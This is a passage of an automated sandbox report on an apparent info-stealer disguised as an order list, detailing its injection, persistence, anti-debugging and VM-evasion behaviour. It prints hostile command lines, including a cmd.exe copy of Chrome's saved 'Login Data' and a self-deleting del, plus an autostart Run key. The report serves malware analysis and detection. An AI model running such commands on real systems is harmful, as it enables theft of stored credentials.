Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019C26F819_2_019C26F8
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0192661119_2_01926611
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0191764019_2_01917640
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_01925E7019_2_01925E70
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_01924E6119_2_01924E61
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019BCE6619_2_019BCE66
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: String function: 00EAB0E0 appears 176 times
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: String function: 00EFDDE8 appears 48 times
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: String function: 00F35110 appears 38 times
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: String function: 00C11AA0 appears 66 times
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: String function: 01985110 appears 40 times
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: String function: 018FB0E0 appears 176 times
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: String function: 0194DDE8 appears 49 times
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: String function: 00C14150 appears 40 times
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0437B0E0 appears 168 times
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 043CDDE8 appears 34 times
PE file contains executable resources (Code or Archives)Show sources
Source: 42LIST OF ITEMS TO ORDER.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: px7426l3fbx.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file contains strange resourcesShow sources
Source: 42LIST OF ITEMS TO ORDER.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: px7426l3fbx.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample file is different than original file name gathered from version infoShow sources
Source: 42LIST OF ITEMS TO ORDER.exe, 00000000.00000003.6490550404.00000000027BF000.00000004.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 42LIST OF ITEMS TO ORDER.exe
Source: 42LIST OF ITEMS TO ORDER.exe, 00000000.00000001.6462771156.0000000000C81000.00000002.sdmpBinary or memory string: OriginalFilenameSamalla.exe2 vs 42LIST OF ITEMS TO ORDER.exe
Source: 42LIST OF ITEMS TO ORDER.exe, 00000003.00000000.6482451627.0000000000C81000.00000002.sdmpBinary or memory string: OriginalFilenameSamalla.exe2 vs 42LIST OF ITEMS TO ORDER.exe
Source: 42LIST OF ITEMS TO ORDER.exe, 00000003.00000002.6638023768.0000000000F9F000.00000040.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 42LIST OF ITEMS TO ORDER.exe
Source: 42LIST OF ITEMS TO ORDER.exe, 00000003.00000002.6633348061.00000000003F0000.00000040.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs 42LIST OF ITEMS TO ORDER.exe
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Windows\SysWOW64\cmmon32.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wow64log.dllJump to behavior
Binary contains paths to development resourcesShow sources
Source: explorer.exe, 00000005.00000000.6551355975.0000000009916000.00000004.sdmpBinary or memory string: .sln}4k
Classification labelShow sources
Source: classification engineClassification label: mal100.spyw.evad.winEXE@272/8@6/2
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\cmmon32.exeFile created: C:\Users\user\AppData\Roaming\77P6C7R2Jump to behavior
Creates temporary filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\CRAIGH~1\AppData\Local\Temp\EobzxyvuhJump to behavior
Launches a second explorer.exe instanceShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: 42LIST OF ITEMS TO ORDER.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe 'C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe'
Source: unknownProcess created: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe 'C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\System32\consent.exe consent.exe 992 272 0000022382FBE480
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\CRAIGH~1\AppData\Local\Temp\DB1' /V
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe
Source: unknownProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe'
Source: unknownProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe
Source: unknownProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: unknownProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: unknownProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe'
Source: unknownProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\autoconv.exe unknown
Source: unknownProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeProcess created: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe 'C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe' Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe' Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exeJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe' Jump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe unknownJump to behavior
Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exeJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\CRAIGH~1\AppData\Local\Temp\DB1' /VJump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeJump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe' Jump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeProcess created: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe 'C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exe' Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\SysWOW64\cmmon32.exeFile written: C:\Users\user\AppData\Roaming\77P6C7R2\77Plogri.iniJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: 42LIST OF ITEMS TO ORDER.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbolsShow sources
Source: Binary string: cmmon32.pdb source: 42LIST OF ITEMS TO ORDER.exe, 00000003.00000002.6633348061.00000000003F0000.00000040.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.6561395724.000000000D810000.00000002.sdmp
Source: Binary string: cmmon32.pdbGCTL source: 42LIST OF ITEMS TO ORDER.exe, 00000003.00000002.6633348061.00000000003F0000.00000040.sdmp
Source: Binary string: wntdll.pdbUGP source: 42LIST OF ITEMS TO ORDER.exe, 00000000.00000003.6491031980.0000000000940000.00000004.sdmp, 42LIST OF ITEMS TO ORDER.exe, 00000003.00000002.6638023768.0000000000F9F000.00000040.sdmp, cmmon32.exe, 00000006.00000002.7705352912.000000000446F000.00000040.sdmp
Source: Binary string: wntdll.pdb source: 42LIST OF ITEMS TO ORDER.exe, cmmon32.exe, px7426l3fbx.exe
Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.6561395724.000000000D810000.00000002.sdmp
PE file contains a valid data directory to section mappingShow sources
Source: 42LIST OF ITEMS TO ORDER.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 42LIST OF ITEMS TO ORDER.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 42LIST OF ITEMS TO ORDER.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 42LIST OF ITEMS TO ORDER.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 42LIST OF ITEMS TO ORDER.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeUnpacked PE file: 19.2.px7426l3fbx.exe.3680000.3.unpack
Contains functionality to dynamically determine API callsShow sources
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_1_00C1A6F5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,18_1_00C1A6F5
PE file contains an invalid checksumShow sources
Source: px7426l3fbx.exe.5.drStatic PE information: real checksum: 0x809f1 should be: 0x81400
Source: 42LIST OF ITEMS TO ORDER.exeStatic PE information: real checksum: 0x809f1 should be: 0x81400
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EFDE2D push ecx; ret 3_2_00EFDE40
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D39D0 push esp; ret 3_2_003D39D5
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D99C5 push eax; ret 3_2_003D9A18
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D9A1B push eax; ret 3_2_003D9A82
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D9A12 push eax; ret 3_2_003D9A18
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D9A7C push eax; ret 3_2_003D9A82
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D4AF5 push ebx; iretd 3_2_003D4AD9
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043CDE2D push ecx; ret 6_2_043CDE40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C1A068 push ds; iretd 6_2_00C1A069
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C199C5 push eax; ret 6_2_00C19A18
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C14AF5 push ebx; iretd 6_2_00C14AD9
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C19A7C push eax; ret 6_2_00C19A82
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C19A12 push eax; ret 6_2_00C19A18
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C19A1B push eax; ret 6_2_00C19A82
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_1_00C14195 push ecx; ret 18_1_00C141A8
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_004199C5 push eax; ret 19_2_00419A18
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_004139D0 push esp; ret 19_2_004139D5
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00419A7C push eax; ret 19_2_00419A82
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00419A12 push eax; ret 19_2_00419A18
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00419A1B push eax; ret 19_2_00419A82
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00414AF5 push ebx; iretd 19_2_00414AD9
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0194DE2D push ecx; ret 19_2_0194DE40

Persistence and Installation Behavior:

barindex
Drops PE filesShow sources
Source: C:\Windows\explorer.exeFile created: C:\Users\CRAIGH~1\AppData\Local\Temp\Eobzxyvuh\px7426l3fbx.exeJump to dropped file

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Windows\SysWOW64\cmmon32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5J8TI4Q8PJCLJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 5J8TI4Q8PJCLJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)Show sources
Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x33 0x34
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EE7AD6 rdtsc 3_2_00EE7AD6
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeAPI coverage: 3.2 %
Source: C:\Windows\SysWOW64\cmmon32.exeAPI coverage: 6.0 %
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeAPI coverage: 3.4 %
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 4776Thread sleep time: -75000s >= -30000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: explorer.exe, 00000005.00000000.6541785190.0000000005240000.00000002.sdmp, svchost.exe, 0000000C.00000002.7748204942.0000022385000000.00000002.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmpBinary or memory string: SCSI\CdRomVBOX____CD-ROM__________
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmpBinary or memory string: SCSI\CdRomVBOX____CD-ROM__________1.0_SCSI\CdRomVBOX____CD-ROM__________SCSI\CdRomVBOX____SCSI\VBOX____CD-ROM__________1VBOX____CD-ROM__________1GenCdRom
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmpBinary or memory string: SCSI\CdRomVBOX____CD-ROM__________1.0_
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmpBinary or memory string: SCSI\VBOX____CD-ROM__________1
Source: svchost.exe, 0000000C.00000000.7211611715.0000022381481000.00000004.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmpBinary or memory string: VBOX____CD-ROM__________1
Source: explorer.exe, 00000005.00000000.6541785190.0000000005240000.00000002.sdmp, svchost.exe, 0000000C.00000002.7748204942.0000022385000000.00000002.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.6541785190.0000000005240000.00000002.sdmp, svchost.exe, 0000000C.00000002.7748204942.0000022385000000.00000002.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 0000000C.00000000.7216767200.0000022382300000.00000004.sdmpBinary or memory string: Hyper-V RAWR=Intel64 Family 6 Model 63 Stepping 2, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=3f02ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=%Program
Source: explorer.exe, 00000005.00000000.6541785190.0000000005240000.00000002.sdmp, svchost.exe, 0000000C.00000002.7748204942.0000022385000000.00000002.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: svchost.exe, 0000000C.00000000.7237472652.0000022384EBF000.00000004.sdmpBinary or memory string: SCSI\CdRomVBOX____
Queries a list of all running processesShow sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for debuggers (devices)Show sources
Source: C:\Windows\explorer.exeFile opened: C:\Windows\WinSxS\FileMaps\_0000000000000000.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeSystem information queried: KernelDebuggerInformationJump to behavior
Checks if the current process is being debuggedShow sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EE7AD6 rdtsc 3_2_00EE7AD6
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EEA240 NtReadFile,LdrInitializeThunk,3_2_00EEA240
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_1_00C13C9A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_1_00C13C9A
Contains functionality to dynamically determine API callsShow sources
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_1_00C1A6F5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,18_1_00C1A6F5
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F3F8F0 mov eax, dword ptr fs:[00000030h]3_2_00F3F8F0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F3F8F0 mov eax, dword ptr fs:[00000030h]3_2_00F3F8F0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ECE0E8 mov eax, dword ptr fs:[00000030h]3_2_00ECE0E8
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED58EB mov eax, dword ptr fs:[00000030h]3_2_00ED58EB
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED58EB mov eax, dword ptr fs:[00000030h]3_2_00ED58EB
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F6B8F9 mov eax, dword ptr fs:[00000030h]3_2_00F6B8F9
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F6B8F9 mov eax, dword ptr fs:[00000030h]3_2_00F6B8F9
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EDA0F8 mov eax, dword ptr fs:[00000030h]3_2_00EDA0F8
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED48CB mov eax, dword ptr fs:[00000030h]3_2_00ED48CB
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED48CB mov eax, dword ptr fs:[00000030h]3_2_00ED48CB
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED48CB mov eax, dword ptr fs:[00000030h]3_2_00ED48CB
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F5F8C0 mov eax, dword ptr fs:[00000030h]3_2_00F5F8C0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F610CF mov eax, dword ptr fs:[00000030h]3_2_00F610CF
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA90D0 mov eax, dword ptr fs:[00000030h]3_2_00EA90D0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA90D0 mov eax, dword ptr fs:[00000030h]3_2_00EA90D0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA90D0 mov eax, dword ptr fs:[00000030h]3_2_00EA90D0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F650B3 mov eax, dword ptr fs:[00000030h]3_2_00F650B3
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F650B3 mov eax, dword ptr fs:[00000030h]3_2_00F650B3
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F708A5 mov eax, dword ptr fs:[00000030h]3_2_00F708A5
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F708A5 mov eax, dword ptr fs:[00000030h]3_2_00F708A5
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F708A5 mov eax, dword ptr fs:[00000030h]3_2_00F708A5
